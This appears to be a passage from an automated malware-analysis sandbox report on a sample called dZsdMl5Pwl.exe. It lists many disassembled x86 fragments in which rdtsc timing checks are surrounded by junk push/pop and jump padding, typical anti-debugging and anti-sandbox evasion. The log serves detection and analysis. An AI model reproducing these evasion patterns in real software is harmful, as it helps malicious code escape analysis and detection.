Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1228568 second address: 1228592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F49E47F214Ch 0x0000000a js 00007F49E47F2146h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F49E47F2155h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122B4FB second address: 122B4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122B4FF second address: 122B503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122E34B second address: 122E35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C43Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123150A second address: 1231528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F2154h 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4E2 second address: 122F4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4E6 second address: 122F4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4EA second address: 122F4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4F3 second address: 122F4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F4FF second address: 122F503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F503 second address: 122F507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 122F5FE second address: 122F609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F49E4E2C436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A16B second address: 123A16F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A16F second address: 123A1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F49E4E2C436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F49E4E2C440h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F49E4E2C43Eh 0x00000019 js 00007F49E4E2C436h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A1A4 second address: 123A1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A1AF second address: 123A1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123A1B3 second address: 123A1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12398F6 second address: 123990C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F49E4E2C436h 0x00000008 jng 00007F49E4E2C436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123990C second address: 1239918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F49E47F2146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1239918 second address: 123993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F49E4E2C449h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 123993C second address: 1239946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F49E47F2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1239A96 second address: 1239A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1239A9A second address: 1239AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F49E47F214Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1241CBF second address: 1241CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1241CCE second address: 1241CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F49E47F2153h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F49E47F214Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1241CF7 second address: 1241D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F49E4E2C43Ah 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1245D1D second address: 1245D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1245D25 second address: 1245D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F49E4E2C436h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1245D34 second address: 1245D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F49E47F2158h 0x00000011 js 00007F49E47F2146h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124662E second address: 124663B instructions: 0x00000000 rdtsc 0x00000002 js 00007F49E4E2C438h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124663B second address: 124666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F49E47F2151h 0x00000014 jmp 00007F49E47F2152h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124666F second address: 1246677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1246E73 second address: 1246E7F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49E47F2146h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A70E second address: 124A714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A714 second address: 124A725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F214Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A725 second address: 124A750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F49E4E2C436h 0x0000000e popad 0x0000000f popad 0x00000010 jng 00007F49E4E2C469h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F49E4E2C441h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A750 second address: 124A764 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F49E47F2146h 0x00000008 jng 00007F49E47F2146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A764 second address: 124A768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125057E second address: 1250588 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49E47F2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124EF94 second address: 124EF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124EF9A second address: 124EF9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF16B second address: 11CF171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF171 second address: 11CF175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF175 second address: 11CF17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF17B second address: 11CF1BB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F49E47F214Ch 0x00000008 jbe 00007F49E47F214Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007F49E47F216Ah 0x00000016 jmp 00007F49E47F2154h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f js 00007F49E47F2146h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125041E second address: 1250432 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F49E4E2C43Ch 0x00000008 js 00007F49E4E2C436h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125389B second address: 12538C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 jmp 00007F49E47F2153h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f je 00007F49E47F2146h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12538C6 second address: 12538CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12538CB second address: 12538E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F49E47F2146h 0x00000009 jne 00007F49E47F2146h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007F49E47F2154h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12538E7 second address: 12538EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258E52 second address: 1258E5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258E5A second address: 1258E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258FC6 second address: 1258FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593AA second address: 12593AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593AE second address: 12593B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593B6 second address: 12593D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E4E2C444h 0x00000008 jmp 00007F49E4E2C43Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593D9 second address: 1259405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F49E47F214Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F49E47F214Dh 0x00000014 jno 00007F49E47F2148h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259537 second address: 1259549 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F49E4E2C436h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258AAF second address: 1258AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258AB3 second address: 1258AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258AD0 second address: 1258B13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F49E47F2152h 0x00000008 jmp 00007F49E47F214Ah 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F49E47F2159h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F49E47F2152h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259952 second address: 1259958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259958 second address: 125995C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125995C second address: 1259975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F49E4E2C441h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259975 second address: 1259979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259B05 second address: 1259B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F49E4E2C436h 0x0000000a ja 00007F49E4E2C436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125E621 second address: 125E625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121BDC3 second address: 121BDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F49E4E2C447h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C19B second address: 121C19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C19F second address: 121C1A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C27B second address: 121C27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C27F second address: 121C290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F49E4E2C436h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C290 second address: 121C2A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C33B second address: 121C341 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C341 second address: 121C36D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F49E47F2158h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C36D second address: 121C372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C372 second address: 121C3F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F49E47F2150h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F49E47F2154h 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F49E47F2148h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1D22h], edi 0x0000003a push A6050D00h 0x0000003f pushad 0x00000040 jmp 00007F49E47F2150h 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED3DF second address: 13ED3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED801 second address: 13ED815 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49E47F2146h 0x00000008 ja 00007F49E47F2146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED9E8 second address: 13ED9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13ED9EC second address: 13ED9F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F49E47F2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F249E second address: 13F2500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E4E2C43Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F49E4E2C438h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jmp 00007F49E4E2C43Bh 0x0000002f push dword ptr [ebp+122D2708h] 0x00000035 mov edx, dword ptr [ebp+12452A59h] 0x0000003b call 00007F49E4E2C439h 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F2500 second address: 13F2504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F2504 second address: 13F254D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F49E4E2C448h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F49E4E2C444h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jng 00007F49E4E2C438h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F254D second address: 13F2551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F406A second address: 13F4075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F4075 second address: 13F4079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 13F4079 second address: 13F4091 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Eh 0x00000007 jnc 00007F49E4E2C436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
